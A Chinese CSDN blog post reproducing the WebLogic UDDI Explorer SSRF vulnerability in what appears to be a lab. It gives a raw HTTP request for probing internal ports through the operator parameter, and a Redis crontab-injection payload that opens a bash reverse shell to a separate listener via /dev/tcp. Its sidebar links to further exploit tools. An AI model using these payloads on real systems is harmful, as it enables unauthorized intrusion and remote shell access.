weblogic-ssrf

最新推荐文章于 2023-11-06 08:56:08 发布
最新推荐文章于 2023-11-06 08:56:08 发布
阅读量165 收藏
点赞数 1
分类专栏: 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/117253649
版权

weblogic-ssrf

1 漏洞原理

  • ssrf探测内网ip、端口,根据回显不同来判断,出现问题的接口/uddiexplorer/SearchPublicRegistries.jsp,operator参数存在问题rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
  • payload
    operator=http://127.0.0.1:7001
    operator=http://127.0.0.1:9000

2 漏洞复现

payload

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Content-Length: 0
Host: 192.168.3.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=vSK2gsqPZg4dJ21k5TyHsj2GGGhtcjMbTsXQvTMZfSpCpymCLqXy!98287205
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

(1)探测本地7001端口
在这里插入图片描述

(2)探测本地9000端口
在这里插入图片描述

3 配合redis有奇效

原理是ssrf攻击内网的redis服务,使用换行,注入http头,在redis计划任务中写入反弹shell的命令
payload

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.3.115/9999 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

(1)探测开启了redis的ip及端口

(2)写入bash反弹,使用url编码
在这里插入图片描述
(3)开启nc监听

wx_7782175678
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp。
SSRF漏洞简析
qq_42383069的博客
12-03 934
SSRF漏洞简析1.漏洞介绍2.漏洞成因3.漏洞流程梳理4.简要总结5.在centos下测试6.利用方式7.常见的防御方法8.ssrf常发生的位置 1.漏洞介绍 SSRF服务器端请求伪造漏洞: 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF访问的是目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) 2.漏洞成因 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 1476
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
浅谈SSRF 加redis反弹shell
god_Zeo的安全博客
03-22 2718
0x00 SSRF简介和原理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如,通过控制前台的请求远程地址加载的响应,来让请求数据由远程的URL域名修改为请求本地、或者内网的IP地址及服务,来造成对内...
我眼中的Weblogic-SSRF
ovowovo的博客
12-10 761
一、ssrf简述: SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因为他是有服务器端发起的,所以他能够请求到与他相连而与外网隔离的内部系统) 影响版本:10.0.2.0 10.3.6.0 SSRF危害以及可实现的攻击行为 主...
Weblogic-SSRF漏洞复现
wodepzw的博客
12-11 460
SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:7001 我们访问的IP是内网ip地址,一般是拒绝访问的 当我们访问一个不存在的端口时,比如 http://127.0.0.1:7000 将会返回:co...
weblogic-monitoring-exporter:WebLogic监视导出器通过REST API公开指标和监视数据,以供其他工具(例如Prometheus)使用
02-04
WebLogic监视导出器 WebLogic Monitoring Exporter使用刮取运行时信息,然后导出与兼容的指标。 它通常作为Web应用程序部署在要从中获取指标的实例的WebLogic Server(WLS)实例12.2.1版或更高版本中。 下载发行版 ...
K8 weblogic-CVE-2018-2628-getshell
07-16
K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用! K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用!
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
weblogic-framework:网络逻辑框架
03-25
weblogic-framework是检测weblogic漏洞的最佳工具。 免责申明 本工具仅适用于安全技术研究,可以使用本工具发起网络黑客攻击,造成的法律后果,请使用者自负。 使用方式 常用突破 由于Weblogic的补丁是互斥的,安装...
漏洞复现】Weblogic SSRF漏洞复现
Miraitowax
02-22 856
Weblogic SSRF的漏洞原理漏洞复现步骤详细总结及剖析
中间件漏洞 | weblogic-ssrf
weixin_52116519的博客
10-22 795
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,探测内网IP及端口的开放情况,进而攻击内网中redis、fastcgi等脆弱组件。漏洞版本:weblogic 10.0.2-10.3.6。
Weblogic ssrf漏洞复现
最新发布
wutiangui的博客
11-06 250
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上;SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以这个请求中的身份来访问其他服务器的资源。产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据。安全的网站应接收请求后,检测请求的合法性。或者使用以下工具探测。
Weblogic SSRF漏洞漏洞复现
挚爱凝华的博客
04-13 403
浏览器访问端口 抓包,看到operator参数是url,应该是存在url漏洞 我们进行抓包,然后将url修改为自己的ip地址+端口号 查看容器内容 找到ip地址 vim /etc/crontab 打开kali进行8888端口的监听 将刚刚输入的内容进行url编码,然后输入/test%0D%0A à换行符url编码 SSRF漏洞原理?如何防御SSRF漏洞?在渗透测试时一般利用SSRF漏洞做什么。 原理:服务端请求伪造(Server-Side Req...
Weblogic服务端请求伪造漏洞SSRF)和反射型跨站请求伪造漏洞(CSS)修复教程...
weixin_34041003的博客
05-02 557
一、服务端请求伪造漏洞 服务端请求伪造(Server-Side Request Forgery),是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。 攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所以SSRF的一大利用是探测内网端口开放信息。(所以...
weblogic漏洞ssrf
08-15
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值